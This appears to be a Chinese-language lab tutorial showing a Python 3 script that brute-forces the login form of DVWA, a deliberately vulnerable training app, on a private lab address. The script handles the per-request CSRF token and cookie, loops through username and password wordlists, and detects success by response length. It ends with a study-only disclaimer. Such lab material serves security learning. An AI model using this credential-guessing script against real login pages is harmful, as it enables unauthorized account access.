• 新版的DVWA刚开始一登录的窗口不像以前只要使用Burpsuite抓个包爆破下就可以，现在是在登录的请求头中加了随机的token
• 所以使用Burpsuite和OWASP ZAP 没有用
• 尝试使用脚本进行匹配爆破猜解出账户和密码
• Python脚本如下，使用的是Python3

#!/usr/local/bin/python3
# -*- coding=utf-8 -*-
# Author: Xiaoyunqi


import urllib
import requests
from bs4 import BeautifulSoup


##第一步，先访问 http://10.7.9.23/dvwa/login.php页面，获得服务器返回的cookie和token
def get_cookie_token():
    headers = {'Host': '10.7.9.23',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Lanuage': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
               'Connection': 'keep-alive',
               'Upgrade-Insecure-Requests': '1'}
    res = requests.get("http://10.7.9.23/dvwa/login.php", headers=headers)
    cookies = res.cookies
    a = [(';'.join(['='.join(item) for item in cookies.items()]))]  ## a为列表，存储cookie和token
    html = res.text
    soup = BeautifulSoup(html, "html.parser")
    token = soup.form.contents[3]['value']
    a.append(token)
    return a

##第二步模拟登陆
def Login(a, username, password):  # a是包含了cookie和token的列表
    headers = {'Host': '10.7.9.23',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
               'Accept-Lanuage': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
               'Connection': 'keep-alive',
               'Content-Length': '88',
               'Content-Type': 'application/x-www-form-urlencoded',
               'Upgrade-Insecure-Requests': '1',
               'Cookie': a[0],
               'Referer': 'http://10.7.9.23/dvwa/login.php'}
    values = {'username': username,
              'password': password,
              'Login': 'Login',
              'user_token': a[1]
              }
    data = urllib.parse.urlencode(values)
    resp = requests.post("http://10.7.9.23/dvwa/login.php", data=data, headers=headers)
    return


# 重定向到index.php
def main():
    with open("user.txt", 'r') as f:
        users = f.readlines()
        for user in users:
            user = user.strip("\n")  # 用户名
            with open("passwd.txt", 'r') as file:
                passwds = file.readlines()
                for passwd in passwds:
                    passwd = passwd.strip("\n")  # 密码
                    a = get_cookie_token()  #a列表中存储了服务器返回的cookie和token
                    Login(a, user, passwd)
                    headers = {'Host': '10.7.9.23',
                               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
                               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                               'Accept-Lanuage': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
                               'Connection': 'keep-alive',
                               'Upgrade-Insecure-Requests': '1',
                               'Cookie': a[0],
                               'Referer': 'http://10.7.9.23/dvwa/login.php'}
                    response = requests.get("http://10.7.9.23/dvwa/index.php", headers=headers)
                    if response.headers['Content-Length'] == '7524':  # 如果登录成功
                        print("用户名为：%s ,密码为：%s" % (user, passwd))  # 打印出用户名和密码
                        break

if __name__ == '__main__':
    main()

• 执行结果

  
  
  2019-11-17_200425.png

• 免责申明:本人所撰写的文章，仅供学习和研究使用，请勿使用文中的技术或源码用于非法用途，任何人造成的任何负面影响，或触犯法律，与本人无关